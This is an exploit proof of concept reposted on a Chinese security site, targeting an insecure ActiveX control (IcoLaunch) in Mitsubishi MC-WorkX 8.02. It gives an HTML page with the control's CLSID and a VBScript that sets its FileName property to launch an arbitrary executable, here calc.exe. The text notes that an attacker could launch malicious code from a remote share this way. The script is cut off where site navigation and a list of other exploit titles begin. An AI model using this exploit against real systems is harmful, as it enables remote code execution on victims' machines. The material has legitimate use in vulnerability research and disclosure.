Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution

来源：vfocus.net 作者：Blake 发布时间：2013-09-16

<html>

<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>

<!--

Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll

Vendor: http://www.meau.com

Version: MC-WorkX 8.02

Tested on: Windows XP SP3 / IE 6

Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000

Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D

ProgId: ICOLAUNCHLib.LaunchCtl

Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll

MemberName: FileName

Safe for scripting: True

Safe for init: True

Kill Bit: False

-->

<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>

<p

>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</

p>

<script language='vbscript'>

file="C:\\WINDOWS\\system32\\calc.exe"

target.FileName = file

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告